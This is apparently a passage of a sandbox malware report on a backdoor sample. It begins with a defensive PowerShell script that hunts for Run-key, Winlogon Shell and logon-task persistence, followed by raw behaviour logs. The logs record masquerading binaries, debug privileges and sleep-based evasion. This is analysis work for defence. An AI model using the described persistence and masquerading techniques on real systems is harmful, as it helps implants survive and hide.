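The three boot-survival mechanisms listed above (Run values written to both HKLM and HKCU, the Winlogon Shell value, and a logon-triggered scheduled task created with schtasks /sc ONLOGON /rl HIGHEST) can be enumerated with the following PowerShell. This is an added example, not part of the report and not code from the sample: it dumps the machine-wide Run values from the native and WOW6432Node views (the sample runs as a 32-bit process, so its HKLM writes may land in the latter, which is also processed at logon) together with the current user's Run values, flags any Winlogon Shell value that is not exactly explorer.exe, and lists logon-triggered tasks whose executable lies outside the Windows and Program Files trees, with the run level the task requests. It assumes an elevated PowerShell 5.1 or later session; the trusted-root list is a triage assumption, not a rule taken from the report.

```powershell
# Added hunting example; not part of the Joe Sandbox report or the analysed sample.
# Assumption: run from an elevated PowerShell 5.1+ session on the host under examination.

function Get-RunKeyEntries {
    # Machine-wide Run values (native view, and the WOW6432Node view a 32-bit writer is redirected
    # to; both are processed at logon) plus the current user's Run values.
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    )
    foreach ($key in $keys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $item = Get-Item -LiteralPath $key
        foreach ($name in $item.GetValueNames()) {
            [pscustomobject]@{ Key = $key; Name = $name; Command = $item.GetValue($name) }
        }
    }
}

function Test-WinlogonShell {
    # Winlogon launches whatever the Shell value names; the only expected value is exactly
    # 'explorer.exe'. A per-user Shell under HKCU is honoured as well, so both hives are read.
    foreach ($key in 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
                     'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon') {
        $shell = (Get-ItemProperty -LiteralPath $key -Name Shell -ErrorAction SilentlyContinue).Shell
        [pscustomobject]@{
            Key        = $key
            Shell      = $shell
            Suspicious = ($null -ne $shell) -and ($shell.Trim() -ne 'explorer.exe')
        }
    }
}

function Get-SuspiciousLogonTasks {
    # Tasks with a logon trigger whose action executes from outside the Windows and Program Files
    # trees, reported with their run level ('Highest' is what schtasks /rl HIGHEST requests).
    $trusted = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
               Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }   # assumption: triage roots
    foreach ($task in Get-ScheduledTask) {
        $logon = @($task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' })
        if ($logon.Count -eq 0) { continue }
        foreach ($action in ($task.Actions | Where-Object { $_.Execute })) {
            # schtasks /tr "'...'" leaves the single quotes in the stored command, so strip both quote kinds.
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim().Trim('"', "'"))
            $inTrusted = $false
            foreach ($root in $trusted) {
                if ($exe.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { $inTrusted = $true }
            }
            if (-not $inTrusted) {
                [pscustomobject]@{
                    Task      = $task.TaskPath + $task.TaskName
                    RunLevel  = $task.Principal.RunLevel
                    Execute   = $exe
                    Arguments = $action.Arguments
                }
            }
        }
    }
}

Get-RunKeyEntries        | Format-Table -AutoSize
Test-WinlogonShell       | Format-Table -AutoSize
Get-SuspiciousLogonTasks | Format-Table -AutoSize
```

Get-RunKeyEntries deliberately returns every value rather than filtering by path: one of the sample's Run entries points at C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, which sits under a trusted root, so each Command has to be compared against where the binary it names legitimately lives (the real WmiPrvSE.exe exists only under %SystemRoot%\System32\wbem and SysWOW64\wbem). Removing the task and the Run values without also fixing a modified Shell value leaves the implant running at the next logon, which is why the three checks belong together.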
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe TID: 7088 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\PerfLogs\KQihinlofznONtA.exe TID: 3320 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6856 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6856 Thread sleep time: -600000s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6856 Thread sleep time: -599891s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6640 Thread sleep count: 399 > 30
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6856 Thread sleep time: -599781s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6928 Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe TID: 7064 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6600 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6600 Thread sleep time: -600000s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6600 Thread sleep time: -599891s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6600 Thread sleep time: -599782s >= -30000s
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe TID: 6832 Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe Thread delayed: delay time: 922337203685477
                        Source: C:\PerfLogs\KQihinlofznONtA.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe Thread delayed: delay time: 600000
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe Thread delayed: delay time: 599891
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe Thread delayed: delay time: 599781
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe Thread delayed: delay time: 600000
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe Thread delayed: delay time: 599891
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe Thread delayed: delay time: 599782
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe Window / User API: threadDelayed 399
                        Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe API call chain: ExitProcess graph end node graph_0-24378
                        Source: w32tm.exe, 0000000D.00000002.1790765005.0000019D56429000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, 00000000.00000003.1633710127.00000000006C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}')"
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, 00000000.00000003.1634732567.00000000006C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y,*'
                        Source: WmiPrvSE.exe, 00000012.00000002.2530502955.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: WmiPrvSE.exe, 00000009.00000002.1760364572.0000000000D86000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLL
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: 0_2_007EDD72 VirtualQuery,GetSystemInfo, 0_2_007EDD72
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: 0_2_007DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_007DA5F4
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: 0_2_007EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_007EB8E0
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe File Volume queried: C:\ FullSizeInformation
                        Source: C:\PerfLogs\KQihinlofznONtA.exe File Volume queried: C:\ FullSizeInformation
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe File Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe File Volume queried: C:\ FullSizeInformation
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe File Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: 0_2_007F753D mov eax, dword ptr fs:[00000030h] 0_2_007F753D
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: 0_2_007F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_007F866F
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe Code function: 0_2_007FB710 GetProcessHeap, 0_2_007FB710
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe Process token adjusted: Debug
                        Source: C:\PerfLogs\KQihinlofznONtA.exe Process token adjusted: Debug
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe Memory allocated: page read and write | page guard
